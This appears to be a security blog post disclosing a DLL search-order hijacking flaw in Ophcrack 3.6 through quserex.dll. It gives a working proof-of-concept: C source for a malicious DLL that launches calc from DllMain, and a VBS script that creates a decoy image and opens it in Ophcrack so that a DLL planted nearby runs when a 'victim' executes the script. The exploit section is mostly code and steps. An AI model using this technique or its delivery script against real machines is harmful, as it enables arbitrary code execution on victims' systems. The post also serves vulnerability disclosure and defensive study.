Ophcrack Path Subversion Arbitrary DLL Injection Code Execution

What is DLL Hijacking?

This is how Microsoft describes it

When an application dynamically loads a dynamic-link library without specifying a fully qualified path name, Windows attempts to locate the DLL by searching a well-defined set of directories in a particular order, as described inĀ Dynamic-Link Library Search Order. If an attacker gains control of one of the directories on the DLL search path, it can place a malicious copy of the DLL in that directory. This is sometimes called aĀ DLL preloading attackĀ or aĀ binary planting attack. If the system does not find a legitimate copy of the DLL before it searches the compromised directory, it loads the malicious DLL. If the application is running with administrator privileges, the attacker may succeed in local privilege elevation.

Basically when an application tries to load a DLL without specifying a fully qualified path name Windows tries to load the DLL in a order of directories. If the application attempts to load a DLL by it’s name it should go in this order of directories (x86).

  1. The directory from which the application loaded.
  2. The system directory.
  3. The 16-bit system directory.
  4. The Windows directory.
  5. The current directory.
  6. The directories that are listed in the PATH environment variable.

Overview of Ophcrack 3.6

I think you all know about Ophcrack, a powerful application for cracking Windows Passwords and it is free of charge. I was able to identify that this application tries to loadĀ quserex.dll file in the exact search order, hence tries to load this DLL in current working directory. Ā Let’s have a closer look at how the application searches the quserex.dll file when we try to open a custom file (.jpg, .mp3, any file) from a different location, in this example I’ve opened a file from the Desktop.

dll1

  1. The directory from which the application loaded. = C:\Program Files\Ophcrack\QSEREX.DLL
  2. The system directory. = C:\WINDOWS\system32\QSEREX.DLL
  3. The 16-bit system directory.Ā = C:\WINDOWS\system\QSEREX.DLL
  4. The Windows directory. = C:\WINDOWS\QSEREX.DLL
  5. The current directory. =Ā C:\Documents and Settings\Administrator\Desktop\Ophcrack\QSEREX.DLL

What we can understand is that application searchesĀ QSEREX.DLL in the current directory which is the Desktop folder in this scenario.

Exploit

[code language=”c”]

/*
* Title: Ophcrack 3.6 Dll Hijacking Exploit (quserex.dll)
* Version: 3.6
* Tested on: Windows 8 64-bit ,Windows XP SP2 en
* Vendor: http://ophcrack.sourceforge.net/
* Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe
* E-Mail: osandajayathissa@gmail.com
* Exploit-Author: Osanda Malith Jayathissa
* /!\ Author is not responsible for any damage you cause
* Use this material for educational purposes only
* Twitter: @OsandaMalith
*/

#include <windows.h>
int pwned()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
pwned();
return 0;
}

[/code]

After compiling the above DLL place it in a remote folder and rename it to quserex.dll. Since Ophcrack doesn’t have any extensions associated we have to dump a random file or create a file and open it with Ophcrack. The DLL will be hijacked to our malicious DLL in which this case is just a calculator.

Automation

We can automate this process by using a script or an external application. I will choose VBS as I amĀ comfortableĀ with the language. This is just a simple idea came to my headĀ to demonstrate this automation.

[code language=”vb” highlight=”8″]

msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Ophcrack Dll Hijacking Exploit")
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true)
objFileToWrite.WriteLine("POC by Osanda Malith :D")
objFileToWrite.Close
file = "new.jpg"
Set oShell = CreateObject("WScript.Shell")
‘ Path to Ophcrack
oShell.Run """%ProgramFiles(x86)%\ophcrack\ophcrack.exe """ & file

[/code]

Make sure you give the exact path to Ophcrack in the script. Now you can place your malicious DLL and this script in the same directory. Once the victim runs the script the DLL will be hijacked.

References

[1] http://msdn.microsoft.com/en-us/library/windows/desktop/ff919712(v=vs.85).aspx
[2]Ā http://osvdb.com/show/osvdb/101734
[3]Ā http://packetstormsecurity.com/files/124645/Ophcrack-3.6-DLL-Hijacking.html
[4] http://secunia.com/community/advisories/56284
 

4 thoughts on “Ophcrack Path Subversion Arbitrary DLL Injection Code Execution

Leave a Reply